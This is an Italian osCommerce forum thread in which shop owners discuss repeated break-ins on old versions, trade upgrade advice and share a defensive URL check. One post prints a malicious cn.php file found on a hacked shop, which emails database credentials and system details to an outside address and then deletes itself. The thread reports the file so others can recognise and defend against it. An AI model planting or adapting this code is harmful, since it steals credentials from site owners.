Attacco Hacker no-stop
Moderatore: mod Generali
Re: Attacco Hacker no-stop
salve a tutti, mi sono appena inscritto perche anche io da qualche giorno sono stato attaccato con l'ho stesso problema qui descritto,
anche se provo a caricare un backup pulito delle cartelle javascript e delle cartelle include catalogo e admin, dopo pochi giorni vengo nuovamente attacato.
ho provato ad inserire la scringa qui descritta ma non mi funziona, devo essere sincero però perche io ho una versione dell'oscomtemplate.
ma fin ora ho potuto installare sempre contribution dell'oscommerce. ho anche la password in htacces in admin........
fra le altre cose, se provo a cambiare il nome all'admin modificando anche il file configure.php, non mi visualizza poi online la pagina, quindi sono costretto a riportarlo come prima...
anche se provo a caricare un backup pulito delle cartelle javascript e delle cartelle include catalogo e admin, dopo pochi giorni vengo nuovamente attacato.
ho provato ad inserire la scringa qui descritta ma non mi funziona, devo essere sincero però perche io ho una versione dell'oscomtemplate.
ma fin ora ho potuto installare sempre contribution dell'oscommerce. ho anche la password in htacces in admin........
fra le altre cose, se provo a cambiare il nome all'admin modificando anche il file configure.php, non mi visualizza poi online la pagina, quindi sono costretto a riportarlo come prima...
Re: Attacco Hacker no-stop
Buttala via!tecknosat ha scritto: devo essere sincero però perche io ho una versione dell'oscomtemplate.
E' un vecchio paccchetto strabacato e non più mantenuto da anni!
Riparti con osC 2.3 ... o magari con osCPRO se vuoi un pacchetto completo e sicuro!
Saluti
Marcus
Nuovo pacchetto osCommercePRO (osCPRO) + Modulo Interfacciamento Gestionale Danea.
Visita la demo: http://oscpro.oscommercedev.com/index.php
Visita la demo: http://oscpro.oscommercedev.com/index.php
Re: Attacco Hacker no-stop
Stesso problema in piu' ho trovato nella cartella images un file chiamato cn.php cosi' :
per segnalare questo indirizzo special-kiss11@live.com qualcuno sa come fare ?
Codice: Seleziona tutto
<?
require("../includes/configure.php");
$pole =
array(HTTP_SERVER,DB_SERVER,DB_SERVER_USERNAME,DB_SERVER_PASSWORD,DIR_WS_HTTP_CATALOG);
$system = array(system(id),system("uname -a"));
mail("special-kiss11@live.com", "hack", "server : $pole[0]$pole[4] host :
$pole[1] user : $pole[2] password : $pole[3]
more info: $system[0], $system[1]");
unlink("cn.php");
?>
Re: Attacco Hacker no-stop
la mia versione è la oscopro 1.5, c.m.q. per quello che vedo il problema e per tutti gli oscommerce......
Re: Attacco Hacker no-stop
si è un problema di tutte le versioni VECCHIE di oscommerce e derivate.
tutte le nuove ne sono immuni.
tutte le nuove ne sono immuni.
Home page personale http://www.magnino.net
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
Re: Attacco Hacker no-stop
una versione nuova sarebbe la osC 2.3?
Re: Attacco Hacker no-stop
si oscommerce 2.3.1 (non te la consiglio)
oppure fra 9 giorni esce oscommerce 3.0 (bellissima e dalle molte aspettative.... è dal 2004 che se ne parla fai te)
o usi la mia versione: oswai
o usi quella di marcus: oscpro
ovvio è solo un mio parere.
oppure fra 9 giorni esce oscommerce 3.0 (bellissima e dalle molte aspettative.... è dal 2004 che se ne parla fai te)
o usi la mia versione: oswai
o usi quella di marcus: oscpro
ovvio è solo un mio parere.
Home page personale http://www.magnino.net
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
Re: Attacco Hacker no-stop
grazie per i consigli
Re: Attacco Hacker no-stop
una domanda, cambiando versione(da oscomtemplate a oscommerce) è possibile poi installare il mio database?
Re: Attacco Hacker no-stop
si e no.
si nel senso che puoi adattarlo
no nel senso che cosi' com'è non puoi farci nulla, devi metterci le manine e modificare/aggiungere/eliminare delle tabelle.
non è un aocsa semplice ed indolore, è un lavoro noioso.... molto noioso
si nel senso che puoi adattarlo
no nel senso che cosi' com'è non puoi farci nulla, devi metterci le manine e modificare/aggiungere/eliminare delle tabelle.
non è un aocsa semplice ed indolore, è un lavoro noioso.... molto noioso
Home page personale http://www.magnino.net
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
Re: Attacco Hacker no-stop
caspita mi piacerebbe conoscerli tutti! ho provato ad approfondire questo e ce l'ho su mio primo shop, il secondo dove ho fatto gli update alla 2.3.1 a questo ne è immune, di certo spaziale.. fortunatamente in un anno che è on-line non ho subito attacchi però..maury2ma ha scritto:Codice: Seleziona tutto
// controlla eventuali intrusioni non autorizzate che sfruttino un bug del sistema $url_php_self = !isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; if ( ( (substr_count($url_php_self, ".php/" . FILENAME_LOGIN) ) != 0) || ( (substr_count($url_php_self, ".php/" . FILENAME_PASSWORD_FORGOTTEN) ) != 0) || ( (substr_count($url_php_self, ".php/" . FILENAME_FORBIDDEN) ) != 0) || ( (substr_count($url_php_self, ".php") ) >= 2) ) { tep_redirect(tep_href_link('index.php')); } if (basename($url_php_self) != $PHP_SELF) { tep_redirect(tep_href_link('index.php')); }
ATTENZIONE: Questi non sono cambiamenti banali. C'è un sacco di codice qui ) bene bravo bis!!:)
Re: Attacco Hacker no-stop
la 3 non sarà completa fino almeno a dicembre. Se uno vuole ripartire o fare uno shop ora, per ragioni di sicurezza e di pulizia del codice è meglio se usa la 2.3.1maury2ma ha scritto:si oscommerce 2.3.1 (non te la consiglio)
oppure fra 9 giorni esce oscommerce 3.0 (bellissima e dalle molte aspettative.... è dal 2004 che se ne parla fai te)
o usi la mia versione: oswai
o usi quella di marcus: oscpro
ovvio è solo un mio parere.
La funzione CERCA si trova sotto al logo Oscommerce italia in questa pagina. - I Love Marketing!
I miei preferiti: internet marketing blog - biancheria da letto - prodotti tipici piemonte - vini piemontesi - roero arneis
I miei preferiti: internet marketing blog - biancheria da letto - prodotti tipici piemonte - vini piemontesi - roero arneis
Re: Attacco Hacker no-stop
concordo... speravo uscisse una 3 stabile ed affidabile.... invece
mi rimangio le parole continuate ad usare la 2.3.1 è moltooooo meglio.
mi rimangio le parole continuate ad usare la 2.3.1 è moltooooo meglio.
Home page personale http://www.magnino.net
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk
SVN aggiornamenti http://code.google.com/p/oswai/source/browse/#svn/trunk